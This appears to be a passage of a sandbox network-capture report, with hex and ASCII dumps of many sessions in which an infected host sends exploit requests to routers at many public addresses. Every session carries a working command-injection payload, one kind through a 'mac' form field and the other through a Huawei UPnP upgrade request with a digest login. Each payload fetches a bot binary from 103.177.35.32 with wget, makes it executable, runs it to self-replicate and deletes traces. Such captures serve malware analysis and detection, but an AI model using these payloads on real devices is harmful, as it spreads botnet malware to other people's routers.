                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        707192.168.2.235774264.203.113.1668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.291109085 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        708192.168.2.233994051.73.215.818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.291119099 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        709192.168.2.2346358131.106.62.228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.291146994 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        710192.168.2.2352822169.132.123.138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.322336912 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        711192.168.2.2359284118.240.228.1748080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.322910070 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        712192.168.2.2353126107.24.143.228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.323241949 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        713192.168.2.235408866.28.69.2358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.323292971 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        714192.168.2.2341876210.194.250.2538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.323309898 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        715192.168.2.2357628157.253.79.8637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.323440075 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        716192.168.2.2347120197.58.188.7537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.323447943 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        717192.168.2.2352806197.7.74.8937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.323448896 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        718192.168.2.235074418.174.225.10037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.323466063 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        719192.168.2.2356370157.168.235.2337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.323477983 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        720192.168.2.2340718157.55.182.14437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.323477983 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        721192.168.2.233763074.153.24.378080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.323532104 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
